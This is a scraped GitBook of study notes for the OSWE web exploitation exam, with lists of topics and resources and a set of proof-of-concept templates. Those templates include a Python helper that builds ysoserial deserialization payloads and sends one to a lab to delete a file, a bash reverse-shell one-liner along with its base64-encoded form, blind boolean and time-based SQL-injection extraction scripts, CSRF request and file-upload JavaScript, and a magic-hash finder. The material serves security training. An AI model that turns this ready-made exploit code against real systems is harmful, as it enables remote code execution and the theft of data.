# Table of Contents - [TL;DR | AWAE - OSWE Preparation / Resources](#tl-dr-awae-oswe-preparation-resources) - [Resources | AWAE - OSWE Preparation / Resources](#resources-awae-oswe-preparation-resources) - [BurpSuite | AWAE - OSWE Preparation / Resources](#burpsuite-awae-oswe-preparation-resources) - [POCs | AWAE - OSWE Preparation / Resources](#pocs-awae-oswe-preparation-resources) - [WhiteBox | AWAE - OSWE Preparation / Resources](#whitebox-awae-oswe-preparation-resources) - [Java | AWAE - OSWE Preparation / Resources](#java-awae-oswe-preparation-resources) - [SQL Injection | AWAE - OSWE Preparation / Resources](#sql-injection-awae-oswe-preparation-resources) - [Deserialization | AWAE - OSWE Preparation / Resources](#deserialization-awae-oswe-preparation-resources) - [Ysoserial | AWAE - OSWE Preparation / Resources](#ysoserial-awae-oswe-preparation-resources) - [SQL Injection | AWAE - OSWE Preparation / Resources](#sql-injection-awae-oswe-preparation-resources) - [CSRF | AWAE - OSWE Preparation / Resources](#csrf-awae-oswe-preparation-resources) - [Type Juggling | AWAE - OSWE Preparation / Resources](#type-juggling-awae-oswe-preparation-resources) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Summary | AWAE - OSWE Preparation / Resources](#summary-awae-oswe-preparation-resources) - [Unknown](#unknown) - [Unknown](#unknown) - [Regex | AWAE - OSWE Preparation / Resources](#regex-awae-oswe-preparation-resources) - [Unknown](#unknown) - [Unknown](#unknown) - [Summary | AWAE - OSWE Preparation / Resources](#summary-awae-oswe-preparation-resources) - [Unknown](#unknown) - [By Language | AWAE - OSWE Preparation / Resources](#by-language-awae-oswe-preparation-resources) - [Regex | AWAE - OSWE Preparation / Resources](#regex-awae-oswe-preparation-resources) - [Injection by clause | AWAE - OSWE Preparation / Resources](#injection-by-clause-awae-oswe-preparation-resources) - [JAVA | AWAE - OSWE Preparation / Resources](#java-awae-oswe-preparation-resources) - [Types | AWAE - OSWE Preparation / Resources](#types-awae-oswe-preparation-resources) - [Bypassing Character Restrictions | AWAE - OSWE Preparation / Resources](#bypassing-character-restrictions-awae-oswe-preparation-resources) - [Summary | AWAE - OSWE Preparation / Resources](#summary-awae-oswe-preparation-resources) - [Regex | AWAE - OSWE Preparation / Resources](#regex-awae-oswe-preparation-resources) - [Practice | AWAE - OSWE Preparation / Resources](#practice-awae-oswe-preparation-resources) - [Deserialization | AWAE - OSWE Preparation / Resources](#deserialization-awae-oswe-preparation-resources) - [Practice | AWAE - OSWE Preparation / Resources](#practice-awae-oswe-preparation-resources) - [Resources | AWAE - OSWE Preparation / Resources](#resources-awae-oswe-preparation-resources) - [Regex | AWAE - OSWE Preparation / Resources](#regex-awae-oswe-preparation-resources) - [Summary | AWAE - OSWE Preparation / Resources](#summary-awae-oswe-preparation-resources) - [Vulnerable Libraries' Implementation | AWAE - OSWE Preparation / Resources](#vulnerable-libraries-implementation-awae-oswe-preparation-resources) - [Resources | AWAE - OSWE Preparation / Resources](#resources-awae-oswe-preparation-resources) - [Practice | AWAE - OSWE Preparation / Resources](#practice-awae-oswe-preparation-resources) - [Resources | AWAE - OSWE Preparation / Resources](#resources-awae-oswe-preparation-resources) - [Regex | AWAE - OSWE Preparation / Resources](#regex-awae-oswe-preparation-resources) - [Summary | AWAE - OSWE Preparation / Resources](#summary-awae-oswe-preparation-resources) - [Random | AWAE - OSWE Preparation / Resources](#random-awae-oswe-preparation-resources) - [Resources | AWAE - OSWE Preparation / Resources](#resources-awae-oswe-preparation-resources) - [XXE | AWAE - OSWE Preparation / Resources](#xxe-awae-oswe-preparation-resources) - [Resources | AWAE - OSWE Preparation / Resources](#resources-awae-oswe-preparation-resources) - [Other Repositories | AWAE - OSWE Preparation / Resources](#other-repositories-awae-oswe-preparation-resources) - [By Language | AWAE - OSWE Preparation / Resources](#by-language-awae-oswe-preparation-resources) - [PHP | AWAE - OSWE Preparation / Resources](#php-awae-oswe-preparation-resources) - [.NET | AWAE - OSWE Preparation / Resources](#-net-awae-oswe-preparation-resources) - [Practice | AWAE - OSWE Preparation / Resources](#practice-awae-oswe-preparation-resources) - [Summary | AWAE - OSWE Preparation / Resources](#summary-awae-oswe-preparation-resources) - [SSTI | AWAE - OSWE Preparation / Resources](#ssti-awae-oswe-preparation-resources) - [JAVA | AWAE - OSWE Preparation / Resources](#java-awae-oswe-preparation-resources) - [Java | AWAE - OSWE Preparation / Resources](#java-awae-oswe-preparation-resources) - [Resources | AWAE - OSWE Preparation / Resources](#resources-awae-oswe-preparation-resources) - [Resources | AWAE - OSWE Preparation / Resources](#resources-awae-oswe-preparation-resources) - [Resources | AWAE - OSWE Preparation / Resources](#resources-awae-oswe-preparation-resources) - [By Language | AWAE - OSWE Preparation / Resources](#by-language-awae-oswe-preparation-resources) - [Compiling & Running | AWAE - OSWE Preparation / Resources](#compiling-running-awae-oswe-preparation-resources) - [File Upload Restrictions Bypass | AWAE - OSWE Preparation / Resources](#file-upload-restrictions-bypass-awae-oswe-preparation-resources) - [NodeJS | AWAE - OSWE Preparation / Resources](#nodejs-awae-oswe-preparation-resources) - [File Extension Filters Bypass List | AWAE - OSWE Preparation / Resources](#file-extension-filters-bypass-list-awae-oswe-preparation-resources) - [Decompiling | AWAE - OSWE Preparation / Resources](#decompiling-awae-oswe-preparation-resources) - [Type Juggling | AWAE - OSWE Preparation / Resources](#type-juggling-awae-oswe-preparation-resources) - [Regex | AWAE - OSWE Preparation / Resources](#regex-awae-oswe-preparation-resources) - [XSS | AWAE - OSWE Preparation / Resources](#xss-awae-oswe-preparation-resources) - [REGEX | AWAE - OSWE Preparation / Resources](#regex-awae-oswe-preparation-resources) - [Practice | AWAE - OSWE Preparation / Resources](#practice-awae-oswe-preparation-resources) - [Tricks | AWAE - OSWE Preparation / Resources](#tricks-awae-oswe-preparation-resources) - [Java | AWAE - OSWE Preparation / Resources](#java-awae-oswe-preparation-resources) - [Practice | AWAE - OSWE Preparation / Resources](#practice-awae-oswe-preparation-resources) - [Summary | AWAE - OSWE Preparation / Resources](#summary-awae-oswe-preparation-resources) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) --- # TL;DR | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/master.md) . This page does **NOT** pretend to replace [AWAE/OSWE](https://www.offensive-security.com/awae-oswe/) content, this is a compilation of the best (**public|my own)** **resources** I have come up with. **AWAE LIST**: * [Persistent Cross-Site Scripting](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#stored) * [Session Hijacking](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#session-hijaking) * [.NET Deserialization](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net) * [Data Exfiltration](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss#data-exfiltration) * [Bypassing File Extension Filters](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/file-extension-filters-bypass) * [Magic Hashes](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling) * [Bypassing REGEX restrictions](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/regex#filter-bypass) * [Cross-Site Request Forgery](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/csrf) * [Type Juggling](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling) * [Blind SQL Injection](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/sql-injection#blind-time-based) * [Bypassing File Upload Restrictions](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass) * [Loose Comparisons](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling) * [Bypassing Character Restrictions](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions) **PERSONAL LIST**: * Blind Time-Based & Boolean SQL Injection + Bypassing Character Restrictions * MySQL * PostgreSQL * Deserialization * PHP * Java * .NET * XSS * Reflected * Stored * Data Exfiltration * Filter Bypass * Loose Comparison * Type Juggling * Magic Hashes * REGEX * Filter Bypass * File Upload Restrictions Bypass * File Extension Filters Bypass Great people I have learnt a ton from: [@secgus](https://twitter.com/secgus) , [@julianjm](https://blog.julianjm.com/) , [@cynops](https://twitter.com/cyn0ps) , [@devploit](https://twitter.com/devploit) , [@oreos](https://twitter.com/oreos_es) , [@rmartinsanta](https://twitter.com/rmartinsanta) . Mentioned people: [@Takito](https://twitter.com/takito1812) , [ITasahobby](https://itasahobby.gitlab.io/) . (**CTF**) Platforms I have enjoyed (and I'm enjoying) **the most**. [Websecwebsec.fr](https://websec.fr/) [247CTF - The game never stops247CTF](https://247ctf.com/) [Web Security Academy: Free Online Training from PortSwiggerWebSecAcademy](https://portswigger.net/web-security) [Cyber Mastery: Community Inspired. Enterprise Trusted. | Hack The Boxhackthebox.eu](https://hackthebox.eu/) [NextResources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/resources) Last updated 6 years ago This site uses cookies to deliver its service and to analyze traffic. By browsing this site, you accept the [privacy policy](https://policies.gitbook.com/privacy/cookies) . AcceptReject --- # Resources | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/resources.md) . [BurpSuite](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/resources/burpsuite) [WhiteBox](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/resources/whitebox) [PreviousTL;DR](https://jorgectf.gitbook.io/awae-oswe-preparation-resources) [NextBurpSuite](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/resources/burpsuite) Last updated 6 years ago --- # BurpSuite | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/resources/burpsuite.md) . [Copy As Python-Requestsportswigger.net](https://portswigger.net/bappstore/b324647b6efa4b6a8f346389730df160) [PreviousResources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/resources) [NextWhiteBox](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/resources/whitebox) Last updated 6 years ago --- # POCs | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs.md) . [Deserialization](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization) [SQL Injection](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/sql-injection) [Type Juggling](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/type-juggling) [CSRF](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/csrf) [PreviousWhiteBox](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/resources/whitebox) [NextDeserialization](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization) Last updated 6 years ago --- # WhiteBox | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/resources/whitebox.md) . [PentesterLab: Introduction to code reviewPentesterlab](https://pentesterlab.com/exercises/codereview/course) [PreviousBurpSuite](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/resources/burpsuite) [NextPOCs](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs) Last updated 6 years ago --- # Java | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java.md) . [Ysoserial Payload Building](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java/ysoserial) [](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java#ysoserial-payload-building) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Serialize/Deserialize Java Example[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java#serialize-deserialize-java-example) ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Binary[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java#binary) Copy import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import java.io.Serializable; public class POC implements Serializable { private String data; public POC(String testData) { data = testData; } public String getData() { return data; } public static void Serialize() { try { // Object Creation POC poctest = new POC("a"); // Creating output stream and writing the serialized object FileOutputStream outfile = new FileOutputStream("serialized.object"); ObjectOutputStream outstream = new ObjectOutputStream(outfile); outstream.writeObject(poctest); outstream.flush(); // closing the stream outstream.close(); System.out.println("Serialized object saved to serialized.object"); } catch (Exception e) { System.out.println(e); }} public static void Deserialize() { try{ ObjectInputStream in = new ObjectInputStream(new FileInputStream("serialized.object")); POC poctest = (POC)in.readObject(); // Printing the data of the serialized object System.out.println("Object's data: " + poctest.data); // Closing the stream in.close(); }catch(Exception e){ System.out.println(e); } } public static void main(String args[]) { POC.Serialize(); // POC.Deserialize(); } } ### XML[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java#xml) [Serialize Java Object to XML using XMLEncoderHowToDoInJava](https://howtodoinjava.com/java/serialization/xmlencoder-and-xmldecoder-example/) [PreviousPHP](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/php) [NextYsoserial](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java/ysoserial) Last updated 6 years ago --- # SQL Injection | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection.md) . [Summary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/summary) [Types](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types) [Injection by clause](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/injection-by-clause) [Bypassing Character Restrictions](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions) [By Language](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language) [Regex](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/regex) [Resources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/resources) [PreviousCSRF](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/csrf) [NextSummary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/summary) Last updated 6 years ago --- # Deserialization | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization.md) . [PHP](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/php) [Java](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java) [PreviousPOCs](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs) [NextPHP](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/php) Last updated 6 years ago --- # Ysoserial | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java/ysoserial.md) . Function[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java/ysoserial#function) ----------------------------------------------------------------------------------------------------------------------------- Copy # Download ysoserial from https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar import subprocess import base64 import urllib.parse def get_ysoserial_payload(command, payloadType, path_to_ysoserial='ysoserial.jar'): proc = subprocess.check_output(['java', '-jar', path_to_ysoserial, payloadType, command]) base64_payload = base64.b64encode(proc).decode() urlEncoded_payload = urllib.parse.quote(base64_payload) return urlEncoded_payload payload = get_ysoserial_payload('command', 'payload') Testing[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java/ysoserial#testing) --------------------------------------------------------------------------------------------------------------------------- ### Portswigger Labs (Spoiler)[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java/ysoserial#portswigger-labs-spoiler) Copy import subprocess import base64 import requests import urllib.parse def get_ysoserial_payload(command, payloadType, path_to_ysoserial='ysoserial.jar'): proc = subprocess.check_output(['java', '-jar', path_to_ysoserial, payloadType, command]) base64_payload = base64.b64encode(proc).decode() urlEncoded_payload = urllib.parse.quote(base64_payload) return urlEncoded_payload payload = get_ysoserial_payload('rm /home/carlos/morale.txt', 'CommonsCollections4') print(payload) req = requests.get('https://YOUR-SESSION.web-security-academy.net/', cookies={'session': payload}) print(req.text) Reverse shell Problem[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java/ysoserial#reverse-shell-problem) ------------------------------------------------------------------------------------------------------------------------------------------------------- Regarding command execution payloads failure while providing `Runtime.getRuntime().exec()` multiple commands, we should be using [this](http://www.jackson-t.ca/runtime-exec-payloads.html) website for building our payload, which will be divided into different key-surrounded commands who are supported by bash. [http://www.jackson-t.ca/runtime-exec-payloads.htmlwww.jackson-t.ca](http://www.jackson-t.ca/runtime-exec-payloads.html) Copy echo "bash -i >& /dev/tcp/127.0.0.1/1234 0>&1" | base64 Copy bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMTIzNCAwPiYxCg==}|{base64,-d}|{bash,-i} [PreviousJava](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java) [NextSQL Injection](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/sql-injection) Last updated 6 years ago --- # SQL Injection | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/sql-injection.md) . Boolean[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/sql-injection#boolean) ---------------------------------------------------------------------------------------------------------- Copy import requests import sys #import urllib3 #urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def test_injection(url, condition): req = requests.get(url)#, verify=False) if condition in req.text: # Check whether the condition has occurred. If so, the injection has been successful. return True else: return False def extract(target, injection, query, condition): pos = 1 extracted = "" while True: for ascii_char in range(32, 126): # Iterate over the ascii range of characters. if test_injection(target + injection.format(query, pos, ascii_char).replace(" ","/**/"), condition): extracted += chr(ascii_char) pos += 1 break else: return extracted def get_admin_email(target, injection, condition): query = "SELECT email FROM users WHERE username = 'admin'" return extract(target, injection, query, condition) def main(): if len(sys.argv) != 4: print("[+] Usage: {} TARGET LHOST LPORT".format(sys.argv[0])) sys.exit(-1) target = sys.argv[1] lhost = sys.argv[2] lport = sys.argv[3] ## MySQL # injection = "') AND ASCII(SUBSTR(({}),{},1))={}%23" # Declare the injection string. # injection = "') AND ASCII(SUBSTR(({}),{},1)){}%23" # Declare the injection string. ## PostgreSQL # injection = "') AND ASCII(SUBSTR(({}),{},1))={}%23" # Declare the injection string. # injection = "') AND ASCII(SUBSTR(({}),{},1))={}%23" # Declare the injection string. extracted_data = get_admin_email(target, injection, "CONDITION") print("[+] EXTRACTED: {}".format(extracted_data) if __name__ == "__main__": main() Blind Time-Based[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/sql-injection#blind-time-based) ---------------------------------------------------------------------------------------------------------------------------- Copy import requests import sys #import urllib3 #urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def test_injection(url, time_condition): req = requests.get(url)#, verify=False) if req.elapsed.total_seconds() > int(time_condition): # Check whether the condition has occurred. If so, the injection has been successful. return True else: return False def extract(target, injection, query, time_condition): pos = 1 extracted = "" while True: for ascii_char in range(32, 126): # Iterate over the ascii range of characters. if test_injection(target + injection.format(query, pos, ascii_char).replace(" ","/**/"), time_condition): extracted += chr(ascii_char) pos += 1 break else: return extracted def get_admin_email(target, injection, time_condition): query = "SELECT email FROM users WHERE username = 'admin'" return extract(target, injection, query, time_condition) def main(): if len(sys.argv) != 4: print("[+] Usage: {} TARGET LHOST LPORT".format(sys.argv[0])) sys.exit(-1) target = sys.argv[1] lhost = sys.argv[2] lport = sys.argv[3] ## MySQL # injection = "') AND ASCII(SUBSTR(({}),{},1))={} AND SLEEP(5)%23" # Declare the injection string. # injection = "') AND ASCII(SUBSTR(({}),{},1)){} AND BENCHMARK(3000000,SHA1(1337))%23" # Declare the injection string. # average 2-3 seconds ## PostgreSQL # injection = "') AND ASCII(SUBSTR(({}),{},1))={} AND (SELECT 1 FROM pg_sleep(10))=1%23" # Declare the injection string. # injection = "') AND ASCII(SUBSTR(({}),{},1))={} AND (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))=1%23" # Declare the injection string. extracted_data = get_admin_email(target, injection, NUMBER_OF_SECONDS_TO_DETECT) print("[+] EXTRACTED: {}".format(extracted_data)) if __name__ == "__main__": main() [PreviousYsoserial](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java/ysoserial) [NextType Juggling](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/type-juggling) Last updated 6 years ago --- # CSRF | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/csrf.md) . Request[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/csrf#request) ------------------------------------------------------------------------------------------------- Copy function req(method, url, body=null) { request = new XMLHttpRequest(); request.open(method, url); if (method.localeCompare("POST") === 0) { request.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); } request.send(body); for(; request.readyState !== XMLHttpRequest.DONE;) return request; } function trigger_change(needed_value) { req("METHOD", "/ENDPOINT", "DATA (IF POST REQUEST)"); } trigger_change("VALUE"); File Upload[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/csrf#file-upload) --------------------------------------------------------------------------------------------------------- Copy var targetLocation= "/ENDPOINT"; function byteValue(x) { return x.charCodeAt(0) & 0xff; } function toBytes(datastr) { var ords = Array.prototype.map.call(datastr, byteValue); var ui8a = new Uint8Array(ords); return ui8a.buffer; } if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { XMLHttpRequest.prototype.sendAsBinary = function(datastr) { this.send(toBytes(datastr)); } } function fileUpload(fileData, fileName) { var fileSize = fileData.length, boundary = "--------------------------------1337", // MAX 70 chars. uri = targetLocation, xhr = new XMLHttpRequest(); var additionalFields = { } var fileFieldName = "fieldName"; xhr.open("POST", uri, true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*;q=0.8") xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request. xhr.setRequestHeader("Content-Length", fileSize); xhr.withCredentials = "true"; xhr.onreadystatechange = function() { console.log(xhr.responseText); } var body = ""; for (var i in additionalFields) { if (additionalFields.hasOwnProperty(i)) { body += addField(i, additionalFields[i], boundary); } } body += addFileField(fileFieldName, fileData, fileName, boundary); body += "--" + boundary + "--"; xhr.sendAsBinary(body); return true; } function addField(name, value, boundary) { var c = "--" + boundary + "\r\n" c += "Content-Disposition: form-data; name='" + name + "'\r\n\r\n"; c += value + "\r\n"; return c; } function addFileField(name, value, filename, boundary) { var c = "--" + boundary + "\r\n" c += "Content-Disposition: form-data; name='" + name + "'; filename='" + filename + "'\r\n"; c += "Content-Type: application/x-compressed\r\n\r\n"; c += value + "\r\n"; return c; } var start = function() { var c = "HEX-FILE-DATA" fileUpload(c, "FILE-NAME"); }; start(); Form Submit[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/csrf#form-submit) --------------------------------------------------------------------------------------------------------- Copy
[PreviousType Juggling](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/type-juggling) [NextSQL Injection](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection) Last updated 6 years ago --- # Type Juggling | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/type-juggling.md) . Copy def find_hash(): x=1 while True: for combo in product("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", repeat=x): # Iterating over the charset with len(x) possible_hash = hashlib.md5(f"{''.join(combo)}".encode("utf-8")).hexdigest() # Generating the hash if possible_hash.startswith("0e") and possible_hash[2:].isdigit(): # Checking for type juggling possibility. print(f"[+] {''.join(combo)} found with hash '{possible_hash}'.") return f"{''.join(combo)}" else: x+=1 [PreviousSQL Injection](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/sql-injection) [NextCSRF](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/csrf) Last updated 6 years ago --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/resources/burpsuite.md). # BurpSuite {% embed url="" %} --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs.md). # POCs - \[Deserialization\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization.md) - \[PHP\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/php.md) - \[Java\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java.md) - \[Ysoserial\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java/ysoserial.md) - \[SQL Injection\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/sql-injection.md) - \[Type Juggling\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/type-juggling.md): Function to find a hash with some specific conditions. - \[CSRF\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/csrf.md): Cross-Site Request Forgery (CSRF) --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/resources.md). # Resources - \[BurpSuite\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/resources/burpsuite.md) - \[WhiteBox\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/resources/whitebox.md) --- # Unknown \# AWAE - OSWE Preparation / Resources ## AWAE - OSWE Preparation / Resources - \[TL;DR\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/master.md) - \[Resources\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/resources.md) - \[BurpSuite\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/resources/burpsuite.md) - \[WhiteBox\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/resources/whitebox.md) - \[POCs\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs.md): Templates for the creation of proof of concepts - 